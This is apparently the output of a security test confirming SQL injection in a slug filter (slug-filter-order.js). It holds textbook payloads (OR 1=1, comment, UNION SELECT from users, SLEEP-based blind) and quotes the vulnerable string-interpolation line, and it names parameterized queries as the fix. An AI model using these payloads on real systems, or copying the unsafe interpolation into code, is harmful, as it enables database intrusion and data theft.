Testing SQL Injection in slug-filter-order.js
==============================================

Test 1: Normal slug filter
Input: slug:[kitchen-sink,bacon,chorizo]
Output: CASE WHEN `tags`.`slug` = 'kitchen-sink' THEN 0 WHEN `tags`.`slug` = 'bacon' THEN 1 WHEN `tags`.`slug` = 'chorizo' THEN 2 END ASC

Test 2: SQL Injection payload (string termination)
Input: slug:[' OR '1'='1]
Output: CASE WHEN `tags`.`slug` = '' OR '1'='1' THEN 0 END ASC
⚠️  VULNERABILITY CONFIRMED: Unsanitized user input in SQL!
    The payload was directly interpolated into the SQL string.

Test 3: SQL Injection payload (comment injection)
Input: slug:[test'--]
Output: CASE WHEN `tags`.`slug` = 'test'--' THEN 0 END ASC
⚠️  VULNERABILITY CONFIRMED: SQL comment injection possible!

Test 4: SQL Injection payload (UNION-based)
Input: slug:[test' UNION SELECT * FROM users--]
Output: CASE WHEN `tags`.`slug` = 'test' UNION SELECT * FROM users--' THEN 0 END ASC
⚠️  VULNERABILITY CONFIRMED: UNION-based SQL injection possible!

Test 5: SQL Injection payload (time-based/blind)
Input: slug:[test' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--]
Output: CASE WHEN `tags`.`slug` = 'test' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--' THEN 0 END ASC
⚠️  VULNERABILITY CONFIRMED: Time-based SQL injection possible!

==============================================
SUMMARY:
The vulnerable code directly interpolates user input into SQL:
  order += `WHEN `${table}`.`slug` = '${slug}' THEN ${index} `;

This allows attackers to inject arbitrary SQL via the slug filter.
The fix uses parameterized queries with ? placeholders.
==============================================

✅ VULNERABILITY CONFIRMED